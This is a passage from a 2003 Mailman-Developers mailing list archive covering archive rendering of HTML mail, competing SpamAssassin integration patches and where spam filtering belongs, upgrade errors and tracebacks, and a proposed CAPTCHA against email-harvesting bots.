> > => free to look or change the settings, and to create a new > > list for > > > => testing. All my lists have this problem so I am sure it is > > nothing > > > => that I have done wrong. > > > => > > > => I'm using Outlook XP 2002 SP-2, but my users (including > > Sean who > > > => sent that last message) may be using something different. > > > => > > > => Thanks and regards, > > > => Martin. > > > => > > > => > > > => On Tue, 2003-11-11 at 13:23, Martin@Cleaver.org wrote: > > > => > > > => > Nick / Barry > > > => > > > => > Can you please at least acknowledge whether this is a > > known problem? > > > => > > > => > Many Thanks, > > > => > > > => > Martin. > > > => > > > => > =My main complaint is that the archives don't work with > > HTML postings > > > => > > > => > =rendering the mailing list practically useless. = > > > => > > > => > =Here's a typical mailing: > > > > > => http://cp1.myhostdns.org/pipermail/social-announce- > > > => ft2004_mbssrc.com/2003-No vember/date.html > > > => > > > => > = > > > => > > > => > =Here's my postings to the cpanel site: > > > => > > > => > = * > > > > > => http://forums.cpanel.net/showthread.php?s=&threadid=15928 > > > => > > > => > = > > > => > > > => > =And I am not alone: > > > => > > > => > = * > > > > > => http://forums.cpanel.net/showthread.php?s=&threadid=13383 > > > => > > > => I'm sorry I can't get into the cpanel forums. > > > => > > > => But I did look at that Pipermail message (you need to > > follow the > > > => link to the one page that's in that date index). If I > > follow the > > > => link to the GIF image, it shows up just fine. > > > => > > > => Please note that the rendering of messages such as > > > => multipart/alternative are depending on list settings that > > I can't > > > => see, such as which content types to pass or scrub. I also > > haven't > > > => seen the original message so I don't know how what was > > posted > > > => matches against the filter_mime_types and pass_mime_types > > settings > > > => in the Content Filter section. There are also some > > site-wide > > > => settings which describe how to archive things like HTML > > messages, > > > => although I don't think that's what's happening here (it > > looks more > > > => like some unintended content-types are getting scrubbed > > out). > > > => > > > => I can't see any bugs, but your list may not be configured > > the way > > > => you want it for the types of messages being posted to it. > > > => > > > => -Barry > > > => > > > => -- > > > => > > > => Martin@Cleaver.org - +1 416 832 7759 > > > => Melbourne Business School FT 2004 MBA Exchange Participant > > to Rotman > > > => > > > => > > > => > > > => > > > => > > > => -----Original Message----- > > > => From: Sean Xi Yu WEN [mailto:x.wen@student.mbs.edu] > > > => Sent: Wednesday, 5 November 2003 12:22 AM > > > => To: Social-announce-ft2004@mbssrc.com > > > => Cc: Martin@Cleaver.org; Quan Zhang > > > => Subject: [Social-announce-ft2004] East Meets West Lunch > > > => > > > => > > > => > > > => Welcome to the launch of the East Meets West Lunch Club!! > > Our launch > > > => involves a delightful eastern lunch in the city this > > coming Monday, > > > => 10 November. Our aim is to meet monthly for lunch > > alternating > > > => between eastern and western themed restaurants. > > > => > > > => Please join us to explore the city and bridge the cultural > > gap. > > > => > > > => > > > => > > > => Monday's menu is set at $13 per person; > > > => > > > => including Chicken with Special Sauce, Sweet and Sour Pork > > and Beef with > > > => Vegetables, all served with vegetable fried rice. > > > => > > > => > > > => > > > => Save December 5 for our next meeting; location to be > > announced. > > > => > > > => > > > => > > > => Time: 1:30 p.m. > > > => > > > => Date: 10 November 2003 > > > => > > > => Place: Num Fong Chinese Restaurant > > > => > > > => 271 Swanston Street, CBD > > > => > > > => > > > => > > > => > > > => > > > => > > > => > > > => > > > => > > > => - Quan (Calvin) Zhang, Xi Yu (Sean) Wen, > > > => > > > => Mindy Frink and Lisa Stevenson (founding members) > > > => > > > => > > > => > > > => > > > => > > > => RSVP to x.xx > > @student.mbs.edu if > > > => you plan to join. > > > => > > > => See you there! > > > => > > > => > > > => > > > => > > > => > > > => > > > => > > > => > > > => > > > => Sean Xi Yu WEN > > > => > > > => MBA - Class of 2004 > > > => > > > => Melbourne Business School > > > =------- End of Original Message ------- > > > > > > > > > > > > > ===== > -- > Martin@Cleaver.org (please don't reply to @yahoo) > > ______________________________________________________________________ > Post your free ad now! http://personals.yahoo.ca > > From PieterB at gewis.nl Sun Nov 16 11:02:29 2003 From: PieterB at gewis.nl (PieterB) Date: Sun Nov 16 11:02:33 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: <1068602871.22989.38.camel@ron> References: <1068602871.22989.38.camel@ron> Message-ID: <20031116160229.GA92340@gewis.win.tue.nl> On Tue, Nov 11, 2003 at 10:07:52PM -0400, Jeff Warnica wrote: > ID 840426 > > This is different from the 'other' SA handler as it deals with pre-taged > messages. IMHO this is far more likely to be the case in an ISP > enviroment. > ... Concerning: http://sf.net/tracker/?group_id=103&atid=300103&func=detail&aid=840426 I noticed there are currently 3 patches concerning SpamAssassin integration with Mailman: 534577 Add SpamAssassin filter to mail pipeline jhenstridge 2002-03-25 Open 640518 SpamAssassin handler jparise 2002-11-18 Open 840426 SpamAssassin handler for pre-tagged mail jeffwarnica 2003-11-11 Open I constructed a similar handler for SpamAssassin which can be used both for systems that pre-tag the messages and for systems that want to use python's to tag the message using spamd/spamc. It's behavioure can be controlled by the mm_cfg parameter SPAMASSASSIN_USE_HEADERS. It parsers both the score and the symbols (tests) from the SpamAssassin-header. It's based on http://www.daa.com.au/~james/articles/mailman-spamassassin/ and should be able to handle both kinds of mailman/spamassassin integration. My version of the patch can be found at http://gewis.nl/~pieterb/python/SpamAssassin.py.txt It would be great if a SpamAssassin.py will be integrated in Mailman 2.1.4! Can anybody commit this SpamAssassin.py and James his spamd.py to the Mailman CVS? Feedback is welcome, Regards, Pieter (pieterb@sf.net) -- You will remember that you forgot to take out the trash when the garbage truck is two doors away. From jeffw at chebucto.ns.ca Mon Nov 17 12:09:30 2003 From: jeffw at chebucto.ns.ca (Jeff Warnica) Date: Mon Nov 17 12:08:22 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: <20031116160229.GA92340@gewis.win.tue.nl> References: <1068602871.22989.38.camel@ron> <20031116160229.GA92340@gewis.win.tue.nl> Message-ID: <1069088968.2011.9.camel@ron> I am definitly prepared to burn the field, plow salt into it, and claim that my creation never existed if this SA module, which from its description sounds like it does what I want, becomes a standard module.. But there definitly should be one of them included as standard. On Sun, 2003-11-16 at 12:02, PieterB wrote: > On Tue, Nov 11, 2003 at 10:07:52PM -0400, Jeff Warnica wrote: > > ID 840426 > > > > This is different from the 'other' SA handler as it deals with pre-taged > > messages. IMHO this is far more likely to be the case in an ISP > > enviroment. > > ... > > Concerning: > http://sf.net/tracker/?group_id=103&atid=300103&func=detail&aid=840426 > > I noticed there are currently 3 patches concerning SpamAssassin > integration with Mailman: > 534577 Add SpamAssassin filter to mail pipeline jhenstridge 2002-03-25 Open > 640518 SpamAssassin handler jparise 2002-11-18 Open > 840426 SpamAssassin handler for pre-tagged mail jeffwarnica 2003-11-11 Open > > I constructed a similar handler for SpamAssassin which can be used > both for systems that pre-tag the messages and for systems that > want to use python's to tag the message using spamd/spamc. > > It's behavioure can be controlled by the mm_cfg parameter > SPAMASSASSIN_USE_HEADERS. It parsers both the score and the symbols > (tests) from the SpamAssassin-header. > > It's based on http://www.daa.com.au/~james/articles/mailman-spamassassin/ > and should be able to handle both kinds of mailman/spamassassin > integration. > > My version of the patch can be found at > > http://gewis.nl/~pieterb/python/SpamAssassin.py.txt > > It would be great if a SpamAssassin.py will be integrated in Mailman > 2.1.4! Can anybody commit this SpamAssassin.py and James his spamd.py > to the Mailman CVS? > > Feedback is welcome, > Regards, > > Pieter > (pieterb@sf.net) From jon at csh.rit.edu Mon Nov 17 14:49:51 2003 From: jon at csh.rit.edu (Jon Parise) Date: Mon Nov 17 14:49:56 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: <1069088968.2011.9.camel@ron> References: <1068602871.22989.38.camel@ron> <20031116160229.GA92340@gewis.win.tue.nl> <1069088968.2011.9.camel@ron> Message-ID: <20031117194950.GC26102@csh.rit.edu> On Mon, Nov 17, 2003 at 01:09:30PM -0400, Jeff Warnica wrote: > I am definitly prepared to burn the field, plow salt into it, and claim > that my creation never existed if this SA module, which from its > description sounds like it does what I want, becomes a standard module.. > But there definitly should be one of them included as standard. I agree with Jeff. I don't plan on maintaining my SpamAssassin patch passed its current incarnation. I welcome a standard implementation. -- Jon Parise (jon@csh.rit.edu) :: http://www.csh.rit.edu/~jon/ From r.barrett at openinfo.co.uk Mon Nov 17 17:52:44 2003 From: r.barrett at openinfo.co.uk (Richard Barrett) Date: Mon Nov 17 17:53:07 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: <20031117194950.GC26102@csh.rit.edu> Message-ID: On Monday, November 17, 2003, at 07:49 pm, Jon Parise wrote: > On Mon, Nov 17, 2003 at 01:09:30PM -0400, Jeff Warnica wrote: > >> I am definitly prepared to burn the field, plow salt into it, and >> claim >> that my creation never existed if this SA module, which from its >> description sounds like it does what I want, becomes a standard >> module.. >> But there definitly should be one of them included as standard. > > I agree with Jeff. I don't plan on maintaining my SpamAssassin patch > passed its current incarnation. I welcome a standard implementation. > Might I ask why enthusiasts for integration SpamAssassin with Mailman do not care about delivery of spam to other mail aliases in their domain. And if they do so care, why do they not concentrate on stopping spam reaching all of their mail aliases. I guess I cannot understand why you are messing around integrating SpammAssassin with Mailman when you should be integrating it with your MTA so that the spam never gets anywhere near Mailman. Or did I miss something important along the way. > -- > Jon Parise (jon@csh.rit.edu) :: http://www.csh.rit.edu/~jon/ > From jeffw at chebucto.ns.ca Mon Nov 17 18:22:22 2003 From: jeffw at chebucto.ns.ca (Jeff Warnica) Date: Mon Nov 17 18:21:16 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: References: Message-ID: <1069111342.2011.56.camel@ron> Uh, because ISPs cant be deleting mail, ever? Or at least deleting messages with an extreemly high score. Tag everything and leave it up to something else to deal with. Something else being procmail, seive, mailman, or the end user agent. Even if you want resonably scored spam not to reach Mailman by silently deleting it, it would be more trouble to scan everything except that destin for Mailman then to just scan everything. On Mon, 2003-11-17 at 18:52, Richard Barrett wrote: > I guess I cannot understand why you are messing around integrating > SpammAssassin with Mailman when you should be integrating it with your > MTA so that the spam never gets anywhere near Mailman. From jerry at sandiego.edu Mon Nov 17 18:26:54 2003 From: jerry at sandiego.edu (Jerold Stratton) Date: Mon Nov 17 18:27:07 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: Message-ID: <8752EEF0-1955-11D8-B9D0-000A959F54EC@sandiego.edu> On Monday, November 17, 2003, at 02:52 PM, Richard Barrett wrote: > Might I ask why enthusiasts for integration SpamAssassin with Mailman > do not care about delivery of spam to other mail aliases in their > domain. And if they do so care, why do they not concentrate on > stopping spam reaching all of their mail aliases. > > I guess I cannot understand why you are messing around integrating > SpammAssassin with Mailman when you should be integrating it with your > MTA so that the spam never gets anywhere near Mailman. > I can't speak for the others, but in my case, I am the administrator for Mailman, but not for the main mailserver, nor even for the mailserver that MailMan runs on. I can install the spamassassin software in the Mailman account; I can even install the spamassassin server software on another server that I run; but I cannot integrate spamassassin with the main mailserver in any way. Our current mail system was designed to discourage server-side spam blocking. Jerry jerry@sandiego.edu http://www.sandiego.edu/~jerry/ Serra 188B/x8773 -- "The major difference between a thing that might go wrong and a thing that cannot possibly go wrong is that when a thing that cannot possibly go wrong goes wrong it usually turns out to be impossible to get at and repair."--Douglas Adams (Mostly Harmless) From jon at csh.rit.edu Mon Nov 17 18:27:12 2003 From: jon at csh.rit.edu (Jon Parise) Date: Mon Nov 17 18:27:17 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: References: <20031117194950.GC26102@csh.rit.edu> Message-ID: <20031117232711.GA5177@csh.rit.edu> On Mon, Nov 17, 2003 at 10:52:44PM +0000, Richard Barrett wrote: > >I agree with Jeff. I don't plan on maintaining my SpamAssassin patch > >passed its current incarnation. I welcome a standard implementation. > > Might I ask why enthusiasts for integration SpamAssassin with Mailman > do not care about delivery of spam to other mail aliases in their > domain. And if they do so care, why do they not concentrate on stopping > spam reaching all of their mail aliases. > > I guess I cannot understand why you are messing around integrating > SpammAssassin with Mailman when you should be integrating it with your > MTA so that the spam never gets anywhere near Mailman. That's actually the reason why I'm no longer maintaining my patch; I've moved to an amavisd / SpamAssassin system that hangs off of Postfix's delivery chain. Because of this, I'd still like to see a standard SpamAssassin-aware handler in Mailman that could react to the tagged messages. -- Jon Parise (jon@csh.rit.edu) :: http://www.csh.rit.edu/~jon/ From pioppo at ferrara.linux.it Mon Nov 17 18:52:45 2003 From: pioppo at ferrara.linux.it (Simone Piunno) Date: Mon Nov 17 18:34:50 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: References: Message-ID: <200311180052.45693.pioppo@ferrara.linux.it> On Monday 17 November 2003 23:52, Richard Barrett wrote: > Might I ask why enthusiasts for integration SpamAssassin with Mailman > do not care about delivery of spam to other mail aliases in their > domain. And if they do so care, why do they not concentrate on stopping > spam reaching all of their mail aliases. > I guess I cannot understand why you are messing around integrating > SpammAssassin with Mailman when you should be integrating it with your > MTA so that the spam never gets anywhere near Mailman. > Or did I miss something important along the way. Yes, you miss that a bayesian filter works better when the non-spam traffic is focused on a given argument. If you train on many lists talking on very different topics, maybe even in different languages, a bayesian classifier is less effective. For this reason it's much better to have a separate spam database for each list. Not to mention how cool can be the Mailman UI as a management interface for your filter (e.g. by training on messages held for moderation). This applies to all bayesian filter, not only to SpamAssassin. -- Adde parvum parvo magnus acervus erit -- Ovidio From claw at kanga.nu Mon Nov 17 19:17:12 2003 From: claw at kanga.nu (J C Lawrence) Date: Mon Nov 17 19:17:18 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: Message from Jeff Warnica of "Mon, 17 Nov 2003 19:22:22 -0400." <1069111342.2011.56.camel@ron> References: <1069111342.2011.56.camel@ron> Message-ID: <15088.1069114632@kanga.nu> On Mon, 17 Nov 2003 19:22:22 -0400 Jeff Warnica wrote: > Uh, because ISPs cant be deleting mail, ever? Actually they can and do, constantly, now, today and for many yesterdays. > Tag everything and leave it up to something else to deal > with. This is quite possible with SpamAssassin installed at the MTA level. > Even if you want resonably scored spam not to reach Mailman by > silently deleting it, it would be more trouble to scan everything > except that destin for Mailman then to just scan everything. It is relatively trivial to configure the MTA to selectively scan mail, be it only mail destined for Mailman, mail destined for local accounts, or whatever. Additionally there are side-benefits from scanning all mail, or at least scanning at a layer higher in the protocol stack: it requires less customisation, grants greater overview of cross-spool mail behaviours (esp statistical), and is less invasive to the mail system in general (not every tool then needs to be SpamAssassin or other-scanner aware). I finally threw SpamAssassin in as a scanner (not teergrube) under Exim last night and am now wrapping up getting TMDA able to run properly on an account behind a POP3/IMAP account (which loses all the envelope information that TMDA depends on). -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From jeffw at chebucto.ns.ca Mon Nov 17 20:25:31 2003 From: jeffw at chebucto.ns.ca (Jeff Warnica) Date: Mon Nov 17 20:24:18 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: <15088.1069114632@kanga.nu> References: <1069111342.2011.56.camel@ron> <15088.1069114632@kanga.nu> Message-ID: <1069118730.4251.31.camel@ron> On Mon, 2003-11-17 at 20:17, J C Lawrence wrote: > On Mon, 17 Nov 2003 19:22:22 -0400 > Jeff Warnica wrote: > > Uh, because ISPs cant be deleting mail, ever? > Actually they can and do, constantly, now, today and for many > yesterdays. The default score for SA to decalre something as Spam is 5. Personaly I dont _ever_ check my spam folder which gets things in it based on that default, though I only ever do a puge by hand... 5 is a very low number to use for automaticly silently deleting mail however. At the ISP level, we delete mail silently for messages with a score above 15 (usualy), unless there seems to be a spam storm, in which case that is lowered to 10, but never below that for silent deletion. I dont monitor the tech support people too carefully, so I dont have a handle on how many people have chosen the 'delete' vs 'drop in different folder' filter options we have. But there is a non-zero value of paranoid people who would be very unhappy if we started deleting mail that moderatly scored. > > Tag everything and leave it up to something else to deal > > with. > This is quite possible with SpamAssassin installed at the MTA level. "Something else", in the case of my patch, is my patch :) And the same logic applies; mail above a very high score is silently deleted, mail above some other score (5 by default) is held for moderation, <5 passes through. While I dont personaly (ever) check my spam folder, if I was moderating a list I would be checking things flaged as spam, especially if it is ie. a tech support list where people would be sending in reports of mail taged as spam for analysis by live people. Idealy whatever patch becomes the standard should be updated to allow per-list filtering options. Some moderators may be willing to live with silent-deletion on what other moderators consiter a very low score. But the generic patch is better then nothing; I dont think there would be a significant burden on the core Mailman developers to update it with any internal changes to Mailman. > or whatever. Additionally there are side-benefits from scanning all > mail, or at least scanning at a layer higher in the protocol stack: it > requires less customisation, grants greater overview of cross-spool mail > behaviours (esp statistical), and is less invasive to the mail system in > general (not every tool then needs to be SpamAssassin or other-scanner > aware). Yes, there is a definite advantage to having scanning done in one place; my patch/plugin deals with pre-taged mail. But I dont want to leave it up to the scanner to delete mail (well, it deletes very high scored mail..). Deleting moderatly scored mail is up to something else. Something else being..... Mailman! Or at least a list moderator using Mailman. From PieterB at gewis.nl Tue Nov 18 06:01:08 2003 From: PieterB at gewis.nl (PieterB) Date: Tue Nov 18 06:01:20 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: References: <20031117194950.GC26102@csh.rit.edu> Message-ID: <20031118110108.GA91862@gewis.win.tue.nl> On Mon, Nov 17, 2003 at 10:52:44PM +0000, Richard Barrett wrote: > Might I ask why enthusiasts for integration SpamAssassin with Mailman > do not care about delivery of spam to other mail aliases in their > domain. And if they do so care, why do they not concentrate on stopping > spam reaching all of their mail aliases. > > I guess I cannot understand why you are messing around integrating > SpammAssassin with Mailman when you should be integrating it with your > MTA so that the spam never gets anywhere near Mailman. > > Or did I miss something important along the way. I would like spamassassin integration with mailman because, there are some messages that tend to be tagged as spam and in fact are not. Messages that are scored between about 4 and 10 should be moderated by the list administrators. Ideally the moderation range should be configurable per-list. The current implementation is systemwide, but that works well enough for me. I don't use bayes-filters per list, but use one bayes filter for all messages processed by mailman (most of my lists are low traffic, so I assume bayes filtering doesn't do very much in that case). The SpamAssassin filter at http://gewis.nl/~pieterb/python/SpamAssassin.py.txt handles both cases of integration and I wonder what's needed to get something like this in the default mailman's distribution. The things that should be done: - make it i18n-aware (i haven't looked into that yet) - improve documentation / faq entry - ... (anything else?) Regards, Pieter -- Just because your doctor has a name for your condition doesn't mean he knows what it is. From bob at nleaudio.com Tue Nov 18 21:02:12 2003 From: bob at nleaudio.com (Bob Puff@NLE) Date: Tue Nov 18 20:58:59 2003 Subject: [Mailman-Developers] What might this be? Message-ID: <3FBACF24.7010706@nleaudio.com> Just saw this tonight, after installing a CVS 2.2a0 last Thursday: > Nov 17 17:54:09 2003 admin(16548): @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ > admin(16548): [----- Mailman Version: 2.2a0 -----] > admin(16548): [----- Traceback ------] > admin(16548): Traceback (most recent call last): > admin(16548): File "/home/mailman/scripts/driver", line 86, in run_main > admin(16548): sys.stdout.write(tempstdout.getvalue()) > admin(16548): IOError: [Errno 32] Broken pipe > admin(16548): [----- Python Information -----] > admin(16548): sys.version = 2.2.3 (#1, Nov 14 2003, 02:10:10) > [GCC 2.95.3 19991030 (prerelease)] > admin(16548): sys.executable = /usr/bin/python > admin(16548): sys.prefix = /usr/local > admin(16548): sys.exec_prefix = /usr/local > admin(16548): sys.path = /usr/local > admin(16548): sys.platform = linux2 > admin(16548): [----- Environment Variables -----] > admin(16548): HTTP_ACCEPT: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg > , application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, a > pplication/x-shockwave-flash, */* > admin(16548): CONTENT_TYPE: multipart/form-data; boundary=-------------------- > -------7d33bd1b370a88 > admin(16548): HTTP_REFERER: http://bretwade.com/mailman/admin/timesandseasons/ > members/add > admin(16548): SERVER_SOFTWARE: Apache-AdvancedExtranetServer/1.3.12 (NetRevol > ution/Linux-Mandrake) mod_ssl/2.6.4 OpenSSL/0.9.5a FrontPage/4.0.4.3 PHP/3.0.17 > mod_perl/1.22 > admin(16548): PYTHONPATH: /home/mailman > admin(16548): SCRIPT_FILENAME: /home/mailman/cgi-bin/admin > admin(16548): SERVER_ADMIN: root@localhost > admin(16548): SCRIPT_NAME: /mailman/admin > admin(16548): SERVER_SIGNATURE: > admin(16548): REQUEST_METHOD: POST > admin(16548): HTTP_HOST: bretwade.com > admin(16548): PATH_INFO: /timesandseasons/members/add > admin(16548): SERVER_PROTOCOL: HTTP/1.1 > admin(16548): QUERY_STRING: > admin(16548): HTTP_CACHE_CONTROL: no-cache > admin(16548): REQUEST_URI: /mailman/admin/timesandseasons/members/add > admin(16548): CONTENT_LENGTH: 914 > admin(16548): HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5 > .1; .NET CLR 1.0.3705; .NET CLR 1.1.4322) > admin(16548): HTTP_CONNECTION: Keep-Alive > admin(16548): HTTP_COOKIE: timesandseasons+admin=280200000069ed50b93f732800000 > 03430646263346563376466326430306330353363303465356464313664323166353030656431383 > 7 > admin(16548): SERVER_NAME: bretwade.com > admin(16548): REMOTE_ADDR: 68.159.132.18 > admin(16548): REMOTE_PORT: 3872 > admin(16548): HTTP_ACCEPT_LANGUAGE: en-us > admin(16548): PATH_TRANSLATED: /home/bretwade/http/timesandseasons/members/add > > admin(16548): SERVER_PORT: 80 > admin(16548): GATEWAY_INTERFACE: CGI/1.1 > admin(16548): HTTP_ACCEPT_ENCODING: gzip, deflate > admin(16548): SERVER_ADDR: 208.34.97.24 > admin(16548): DOCUMENT_ROOT: /home/bretwade/http Bob From bob at nleaudio.com Tue Nov 18 21:06:42 2003 From: bob at nleaudio.com (Bob Puff@NLE) Date: Tue Nov 18 21:03:27 2003 Subject: [Mailman-Developers] No list of lists Message-ID: <3FBAD032.5060502@nleaudio.com> On another note, I noticed that after upgrading one of my servers that was running 2.0.x, I no longer see the list of lists when accessing the /mailman/admin or /mailman/listinfo URLs. Things still seem to work if I enter the appropriate list name in though. Could this from the error log be the culprit: > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/rccal > l/config.pck.last > [Errno 2] No such file or directory: '/home/mailman/lists/rccall/config.pck.last > ' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/rccme > n/config.pck > [Errno 2] No such file or directory: '/home/mailman/lists/rccmen/config.pck' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/rccme > n/config.pck.last > [Errno 2] No such file or directory: '/home/mailman/lists/rccmen/config.pck.last > ' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/rccme > n/config.pck > [Errno 2] No such file or directory: '/home/mailman/lists/rccmen/config.pck' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/rccme > n/config.pck.last > [Errno 2] No such file or directory: '/home/mailman/lists/rccmen/config.pck.last > ' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/rccme > n/config.pck > [Errno 2] No such file or directory: '/home/mailman/lists/rccmen/config.pck' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/rccme > n/config.pck.last > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/thepr > ophets-update/config.pck > [Errno 2] No such file or directory: '/home/mailman/lists/theprophets-update/con > fig.pck' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/thepr > ophets-update/config.pck.last > [Errno 2] No such file or directory: '/home/mailman/lists/theprophets-update/con > fig.pck.last' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/thepr > ophets-update/config.pck > [Errno 2] No such file or directory: '/home/mailman/lists/theprophets-update/con > fig.pck' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/thepr > ophets-update/config.pck.last > [Errno 2] No such file or directory: '/home/mailman/lists/theprophets-update/con > fig.pck.last' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/thepr > ophets-update/config.pck > [Errno 2] No such file or directory: '/home/mailman/lists/theprophets-update/con > fig.pck' > Nov 14 01:08:33 2003 (14822) couldn't load config file /home/mailman/lists/thepr > ophets-update/config.pck.last There was a config.db and config.db.last in each of those before, not a pck. Is there any way to fix the "list of lists"? Bob From barry at python.org Tue Nov 18 21:14:09 2003 From: barry at python.org (Barry Warsaw) Date: Tue Nov 18 21:14:17 2003 Subject: [Mailman-Developers] What might this be? In-Reply-To: <3FBACF24.7010706@nleaudio.com> References: <3FBACF24.7010706@nleaudio.com> Message-ID: <1069208048.23962.29.camel@anthem> On Tue, 2003-11-18 at 21:02, Bob Puff@NLE wrote: > Just saw this tonight, after installing a CVS 2.2a0 last Thursday: To be honest, I wouldn't recommend using 2.2 on a production system. Right now it works and hasn't diverged much from 2.1, but I'm not making any guarantees during alpha. If you're looking for something stable, please use the 2.1 branch (specifically, the tag Release_2_1-maint). I think this error is saying that somehow the connection between Mailman's stdout and your web server got snipped. -Barry From barry at python.org Tue Nov 18 21:16:40 2003 From: barry at python.org (Barry Warsaw) Date: Tue Nov 18 21:16:47 2003 Subject: [Mailman-Developers] No list of lists In-Reply-To: <3FBAD032.5060502@nleaudio.com> References: <3FBAD032.5060502@nleaudio.com> Message-ID: <1069208200.23962.33.camel@anthem> On Tue, 2003-11-18 at 21:06, Bob Puff@NLE wrote: > On another note, I noticed that after upgrading one of my servers that was running 2.0.x, I no > longer see the list of lists when accessing the /mailman/admin or /mailman/listinfo URLs. Things > still seem to work if I enter the appropriate list name in though. > > Could this from the error log be the culprit: No. This is really just telling you that Mailman 2.1 now uses pickle .pck files, where as 2.0 used marshal .db files. These warnings are normal for the first load of the file after the upgrade, and are no cause for alarm! > There was a config.db and config.db.last in each of those before, not a pck. > Is there any way to fix the "list of lists"? I'm betting the virtual host support in Mailman 2.1 is messing you up. Are those lists homed to a different domain than the one you're visiting them by? -Barry From bob at nleaudio.com Tue Nov 18 21:22:40 2003 From: bob at nleaudio.com (Bob Puff@NLE) Date: Tue Nov 18 21:22:45 2003 Subject: [Mailman-Developers] No list of lists In-Reply-To: <1069208200.23962.33.camel@anthem> References: <3FBAD032.5060502@nleaudio.com> <1069208200.23962.33.camel@anthem> Message-ID: <20031119022240.M13700@nleaudio.com> Oh, that is slick! You are right indeed! Looking good. Sorry for the panic call. Bob ---------- Original Message ----------- From: Barry Warsaw To: "Bob Puff@NLE" Sent: Tue, 18 Nov 2003 21:16:40 -0500 Subject: Re: [Mailman-Developers] No list of lists > On Tue, 2003-11-18 at 21:06, Bob Puff@NLE wrote: > > On another note, I noticed that after upgrading one of my servers that was running 2.0.x, I no > > longer see the list of lists when accessing the /mailman/admin or /mailman/listinfo URLs. Things > > still seem to work if I enter the appropriate list name in though. > > > > Could this from the error log be the culprit: > > No. This is really just telling you that Mailman 2.1 now uses pickle > .pck files, where as 2.0 used marshal .db files. These warnings are > normal for the first load of the file after the upgrade, and are no > cause for alarm! > > > There was a config.db and config.db.last in each of those before, not a pck. > > Is there any way to fix the "list of lists"? > > I'm betting the virtual host support in Mailman 2.1 is messing you > up. Are those lists homed to a different domain than the one you're visiting > them by? > > -Barry ------- End of Original Message ------- From darsie at gmx.at Sun Nov 16 09:39:22 2003 From: darsie at gmx.at (Bernhard Kuemel) Date: Thu Nov 20 09:24:32 2003 Subject: [Mailman-Developers] "Turing test" to reject email harvesting bots Message-ID: <3FB78C1A.5080702@gmx.at> Hi mailman-users! I wrote a "turing test" that keeps e.g. email harvesting bots off: http://bksys.at/bernhard/img/turing.php?who=agent%20smith source: http://bksys.at/bernhard/img/turing.txt Since it is trivial to collect "high quality" email addresses form mailman lists even if they are only available to the members I'd like such a turing test be in mailman. Either before the "view subscribers" page or as part of the subscription process. http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Click+here+for+the+list%22+%22batched+in+a+daily+digest%22&btnG=Google+Search yields 24000 hits. http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22The+subscribers+list+is+only+available+to+the+list+members yields 40000 hits. The text image generation is a little CPU intensive (2 s on a 1800 MHz P4) so some measures may be desirable to prevent DoS attacks by flood requests of the images. E.g. Put the test after receival of the subscription email cookie was returned. This test may disable users of non graphical web browers or email only subscribers to subscribe. Bernhard -- Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at Linux Admin/Programmierer: http://bksys.at/bernhard/services.html From joao at silvaneves.org Fri Nov 14 14:50:02 2003 From: joao at silvaneves.org (=?ISO-8859-1?Q?Jo=E3o?= Miguel Neves) Date: Thu Nov 20 09:24:53 2003 Subject: [Mailman-Developers] [Patch] Keyboard shortcuts in archive Message-ID: <1068839397.1236.17.camel@home.silvaneves.org> Skipped content of type multipart/mixed-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Esta =?ISO-8859-1?Q?=E9?= uma parte de mensagem assinada digitalmente Url : http://mail.python.org/pipermail/mailman-developers/attachments/20031114/531a2d18/attachment.bin From kcoskun at bilgi.edu.tr Sat Nov 15 05:38:35 2003 From: kcoskun at bilgi.edu.tr (Kaan) Date: Thu Nov 20 09:25:38 2003 Subject: [Mailman-Developers] Re: [Mailman-Users] HTML archives are not updating In-Reply-To: <3FB399F8.7080300@bilgi.edu.tr> References: <3FB399F8.7080300@bilgi.edu.tr> Message-ID: <3FB6022B.40206@bilgi.edu.tr> Hi, I have spotted the problem. It took a few days unfortunately. The problem was the permissions. When copying from the old server to the new server permission was changed. Since there was a command to check permissions I had the idea of a problem with in permissions very lately. May be this command may be modified to check archive folders also. And I could not find any error messages in the mailman log messages. Best Wishes, Kaan Coskun Kaan wrote: > Hi, > > I am updating to mailman 2.1.3 from 2.0.13. I have copied the list files > and archive files to the new machine which mailman 2.1.3 is set up. Mail > list is functioning. I am sending and receiving mail over this mail > list. And maillist.mbox files is been updated. But HTML archives are 